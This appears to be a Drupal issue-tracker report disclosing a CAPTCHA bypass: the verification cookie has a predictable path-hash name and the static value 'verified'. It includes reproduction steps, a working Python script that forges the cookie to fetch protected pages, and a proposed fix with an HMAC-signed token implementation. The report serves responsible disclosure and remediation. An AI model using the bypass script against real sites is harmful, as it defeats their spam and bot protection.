Problem/Motivation

CAPTCHA protection can be completely bypassed by forging the verification cookie. The cookie uses a predictable name (captcha_protected_ + base64url(SHA256(path))) and static value (verified), which allows attackers to skip CAPTCHA verification entirely.

Steps to reproduce

  1. Compute cookie name: captcha_protected_ + base64url(SHA256(path))
  2. Set cookie: captcha_protected_<hash>=verified
  3. Access protected page → Returns 200 without CAPTCHA

Example bypass script:

#!/usr/bin/env python3
# Forges the CAPTCHA verification cookie for the given URL and fetches the page.
import sys
import hashlib
import base64
from urllib.parse import urlparse
import requests

if len(sys.argv) <= 1:
    raise ValueError("Usage: python3 bypass.py <url>")
url = sys.argv[1]
# The cookie name depends only on the request path, so it is predictable.
path = urlparse(url).path or '/'
h = hashlib.sha256(path.encode()).digest()
cookie_name = 'captcha_protected_' + base64.urlsafe_b64encode(h).decode().rstrip('=')

# The static value "verified" is accepted without any signature or session check.
print(requests.get(url, cookies={cookie_name: 'verified'}, allow_redirects=False).text)

Proposed resolution

Replace the static cookie value with a cryptographically signed token:

$token = Crypt::hmacBase64($path . time(), Settings::getHashSalt());

Alternatively, use server-side session validation instead of relying solely on cookies.

Location: src/Form/CaptchaForm.php lines 161-163
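The following is an added illustration of the proposed fix, written here in Python rather than taken from the module. It models the signed-token scheme: the cookie value becomes `<issued>.<mac>`, where the MAC is an HMAC-SHA256 over the path and the issue time, base64url-encoded like Drupal's Crypt::hmacBase64(). Carrying the timestamp in the cookie is what lets the server recompute the MAC and enforce an expiry, which a bare `$path . time()` token on its own cannot provide. The secret, the NUL separator and the one-hour TTL are constructed assumptions, as is the check that the old static value `verified` is now rejected.

```python
import base64
import hashlib
import hmac
import time
from typing import Optional

# Constructed example secret. A real deployment would use the site's hash salt
# (Settings::getHashSalt() in Drupal) and never embed it in source.
SECRET = b"example-hash-salt-do-not-use"
TOKEN_TTL = 3600  # assumed lifetime of a verification cookie, in seconds


def _b64url(raw: bytes) -> str:
    """base64url without padding, matching the module's cookie-name encoding."""
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def cookie_name(path: str) -> str:
    """Cookie name as the module builds it: captcha_protected_ + base64url(SHA256(path))."""
    return "captcha_protected_" + _b64url(hashlib.sha256(path.encode()).digest())


def _mac(path: str, issued: int, secret: bytes) -> str:
    """HMAC-SHA256 over path and issue time; NUL separator is an assumption."""
    msg = f"{path}\x00{issued}".encode()
    return _b64url(hmac.new(secret, msg, hashlib.sha256).digest())


def issue_token(path: str, secret: bytes = SECRET, now: Optional[int] = None) -> str:
    """Cookie value to set after a successful CAPTCHA: '<issued>.<mac>'."""
    issued = int(time.time()) if now is None else now
    return f"{issued}.{_mac(path, issued, secret)}"


def verify_token(path: str, token: str, secret: bytes = SECRET,
                 now: Optional[int] = None, ttl: int = TOKEN_TTL) -> bool:
    """Accept a token only if its MAC matches this path and it has not expired."""
    now = int(time.time()) if now is None else now
    issued_str, sep, mac = token.partition(".")
    if not sep or not issued_str.isdigit():
        return False  # malformed, including the old static value "verified"
    issued = int(issued_str)
    if issued > now or now - issued > ttl:
        return False  # future-dated or expired
    expected = _mac(path, issued, secret)
    # Constant-time comparison so MAC checking does not leak timing information.
    return hmac.compare_digest(expected, mac)


def demo(now: int = 1_700_000_000) -> dict:
    """Exercise the scheme at a fixed clock and report each outcome."""
    path = "/contact"
    token = issue_token(path, now=now)
    return {
        "cookie": cookie_name(path),
        "genuine": verify_token(path, token, now=now + 10),
        "static_value": verify_token(path, "verified", now=now + 10),
        "other_path": verify_token("/other", token, now=now + 10),
        "expired": verify_token(path, token, now=now + TOKEN_TTL + 1),
        "wrong_secret": verify_token(path, token, secret=b"other", now=now + 10),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

Only the genuine token is accepted; the static value, a token minted for a different path, an expired token and a token signed with another secret are all refused. Binding the MAC to the path also means a token obtained on one protected form cannot be replayed on another.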


Comments

lovasoa created an issue. See original summary.
